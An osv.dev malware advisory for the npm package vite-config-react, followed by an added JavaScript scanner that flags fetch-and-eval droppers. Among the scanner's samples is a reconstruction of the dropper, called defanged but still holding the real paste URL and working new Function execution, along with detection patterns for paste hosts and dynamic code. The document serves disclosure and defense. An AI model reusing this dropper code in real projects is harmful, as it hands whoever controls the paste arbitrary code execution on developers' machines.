vite-config-react @1.3.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5728
Ecosystem
npm
Summary
On require / import of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js. That file runs an IIFE which performs axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } }), reads .data.config from the response, and executes the returned string via new Function('require', s)(require), where require is a real Node require constructed through createRequire(import.meta.url). The fetch-and-eval is wrapped in a 5-attempt retry loop whose try/catch swallows every error, so a failed fetch produces no visible symptom.
The dropper hides its intent in two ways. It shadows the global process with a local object whose keys are named DEV_API_KEY, DEV_SECRET_KEY and DEV_SECRET_VALUE, so the hardcoded URL and header read like ordinary environment-variable lookups, and it names the wrapper function getCallers. jsonkeeper.com is an anonymous, mutable paste host and the fetched content is not hash-pinned, so whoever controls the paste can swap the executed payload at any time; the payload observed during analysis says nothing about what will be served tomorrow.
Any project that imports this package (for example from vite.config.js) hands the package author, or whoever controls the paste, arbitrary code execution on the developer's or CI machine with full require access. Because the code runs at import time rather than from an install script, installing with --ignore-scripts does not prevent it; only removing the package from the dependency tree does.
Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)
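The indicators the summary lists (a string executed via new Function, a shadowed process object, a mutable paste host, a network fetch at import time, a swallowed retry loop, a bare side-effect import chain) can be turned into a triage scan over a package's source files. What follows is an added example written for this page, not code from the package, from osv.dev or from Amazon Inspector. The three sample sources are constructed; the dropper sample is a defanged reconstruction from the prose above and is only scanned as text, never imported or executed. The indicator weights and the flag threshold are arbitrary choices made for the example.

```javascript
// Added example: heuristic indicator scan for the fetch-and-eval dropper pattern.
// Not the package's code. Sample sources below are CONSTRUCTED for this example.
// Run with: node scan.js

const INDICATORS = [
  // Executing a fetched string as code is the core of the dropper.
  { id: 'dynamic-code',       weight: 3, re: /new\s+Function\s*\(|\beval\s*\(/ },
  // A local `process` object makes hardcoded values read like env lookups.
  { id: 'process-shadow',     weight: 3, re: /\b(?:const|let|var)\s+process\s*=/ },
  // Anonymous, mutable paste hosts serve as unpinned payload sources.
  { id: 'paste-host',         weight: 2, re: /jsonkeeper\.com|pastebin\.com|paste\.ee/i },
  // A network fetch inside a module that runs on import.
  { id: 'remote-fetch',       weight: 1, re: /\baxios\.get\s*\(|\bfetch\s*\(|\bhttps?\.get\s*\(/ },
  // Handing a real `require` to evaluated code gives it the whole runtime.
  { id: 'createRequire',      weight: 1, re: /createRequire\s*\(\s*import\.meta\.url\s*\)/ },
  // Empty catch blocks hide fetch/eval failures from the victim.
  { id: 'swallowed-catch',    weight: 1, re: /catch\s*(?:\([^)]*\))?\s*\{\s*\}/ },
  // Bare side-effect imports are how the entrypoint chain reaches the dropper.
  { id: 'side-effect-import', weight: 1, re: /^\s*import\s+['"][^'"]+['"]\s*;?\s*$/m },
];

// Arbitrary threshold for this example: a file is flagged when the summed
// weight of its matched indicators reaches this value.
const FLAG_THRESHOLD = 5;

// Scan one source file; returns the score, verdict and the matched snippets
// so an analyst can see why a file was flagged.
function scanSource(path, src) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    const m = ind.re.exec(src); // no /g flag, so exec() is stateless
    if (m) {
      hits.push({ id: ind.id, weight: ind.weight, sample: m[0].trim().slice(0, 60) });
      score += ind.weight;
    }
  }
  return { path, score, flagged: score >= FLAG_THRESHOLD, hits };
}

// Scan a list of { path, src } files and order the results by score, highest first.
function triage(files) {
  return files.map((f) => scanSource(f.path, f.src)).sort((a, b) => b.score - a.score);
}

// CONSTRUCTED sample: defanged reconstruction of the dropper from the advisory
// text. It is data for the scanner only; nothing here evaluates it.
const DROPPER_SAMPLE = `
import axios from 'axios';
import { createRequire } from 'module';
const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/AAON3', DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } };
const require = createRequire(import.meta.url);
(async function getCallers() {
  for (let i = 0; i < 5; i++) {
    try {
      const res = await axios.get(process.env.DEV_API_KEY, { headers: { [process.env.DEV_SECRET_KEY]: process.env.DEV_SECRET_VALUE } });
      new Function('require', res.data.config)(require);
      return;
    } catch (e) {}
  }
})();
`;

// CONSTRUCTED sample: the link in the import chain, a bare side-effect import
// next to otherwise ordinary code. On its own it stays below the threshold.
const PLUGINS_SAMPLE = `
import react from '@vitejs/plugin-react';
import './extras/config.js';

export function plugins() {
  return [react()];
}
`;

// CONSTRUCTED sample: an ordinary Vite config that reads process.env normally.
const BENIGN_SAMPLE = `
import { defineConfig } from 'vite';
import react from '@vitejs/plugin-react';

export default defineConfig({
  plugins: [react()],
  define: { __API_URL__: JSON.stringify(process.env.VITE_API_URL) },
});
`;

const SAMPLES = [
  { path: 'features/plugins.js', src: PLUGINS_SAMPLE },
  { path: 'features/extras/config.js', src: DROPPER_SAMPLE },
  { path: 'vite.config.js', src: BENIGN_SAMPLE },
];

for (const r of triage(SAMPLES)) {
  const ids = r.hits.map((h) => h.id).join(', ');
  console.log(`${r.flagged ? 'FLAG' : 'ok  '} ${r.path} score=${r.score} [${ids}]`);
}
```

The point of weighting rather than matching a single regex is that no one indicator is damning on its own: a side-effect import or an axios call is routine, and even new Function appears in legitimate build tooling. The combination described in the summary scores well above any of the benign samples, and the returned hits give the reviewer the matched snippets to confirm by hand before blocking the package.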